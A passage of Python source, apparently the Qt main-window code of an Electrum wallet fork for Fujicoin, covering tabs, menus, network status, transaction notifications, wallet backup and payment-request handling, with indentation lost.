self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Fujicoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Fujicoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Fujicoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://www.fujicoin.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('fujicoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Fujicoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Fujicoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Fujicoin address where the payment should be received. Note that each payment request uses a different Fujicoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Fujicoin addresses.'),
_('The fujicoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
